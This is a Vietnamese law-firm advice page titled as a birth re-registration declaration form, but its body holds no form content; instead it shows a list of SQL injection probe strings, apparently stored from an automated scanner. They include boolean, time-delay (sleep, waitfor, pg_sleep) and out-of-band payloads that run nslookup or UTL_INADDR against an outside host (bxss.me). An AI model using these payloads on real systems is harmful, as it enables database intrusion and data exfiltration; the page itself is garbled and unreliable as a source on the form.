Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Tờ khai đăng kí lại việc khai sinh

Cập nhật lần cuối lúc 10:09 ngày 16/07/2013

Nguồn: vinalaf.com.vn
1
1
1
1'"
\
1
1
-1 OR 2+385-385-1=0+0+0+1 --
@@H4sPq
-1 OR 3+385-385-1=0+0+0+1 --
JyI=
-1 OR 3*2<(0+5+385-385) --
-1 OR 3*2>(0+5+385-385) --
-1 OR 2+208-208-1=0+0+0+1
-1 OR 3+208-208-1=0+0+0+1
-1 OR 3*2<(0+5+208-208)
-1 OR 3*2>(0+5+208-208)
-1' OR 2+894-894-1=0+0+0+1 --
-1' OR 3+894-894-1=0+0+0+1 --
-1' OR 3*2<(0+5+894-894) --
-1' OR 3*2>(0+5+894-894) --
-1' OR 2+252-252-1=0+0+0+1 or 'U2legdyv'='
-1' OR 3+252-252-1=0+0+0+1 or 'U2legdyv'='
-1' OR 3*2<(0+5+252-252) or 'U2legdyv'='
-1' OR 3*2>(0+5+252-252) or 'U2legdyv'='
-1" OR 2+838-838-1=0+0+0+1 --
-1" OR 3+838-838-1=0+0+0+1 --
-1" OR 3*2<(0+5+838-838) --
-1" OR 3*2>(0+5+838-838) --
if(now()=sysdate(),sleep(36.032),0)/*'XOR(if(now()=sysdate(),sleep(36.032),0))OR'"XOR(if(now()=sysdate(),sleep(36.032),0))OR"*/
(select(0)from(select(sleep(36.032)))v)/*'+(select(0)from(select(sleep(36.032)))v)+'"+(select(0)from(select(sleep(36.032)))v)+"*/
-1; waitfor delay '0:0:54.047999999999995' --
-1); waitfor delay '0:0:54.047999999999995' --
1 waitfor delay '0:0:54.047999999999995' --
MKwCF8h2'; waitfor delay '0:0:18.016' --
-1;select pg_sleep(18.016); --
-1);select pg_sleep(18.016); --
-1));select pg_sleep(18.016); --
Z56fAsaZ';select pg_sleep(36.032); --
jNQ9Gpaj');select pg_sleep(36.032); --
AT1MtQCu'));select pg_sleep(54.047999999999995); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6095.34060.b62fd.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6096.34060.b62fd.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-6097.34060.b62fd.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-6098.34060.b62fd.\1.bxss.me
661'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: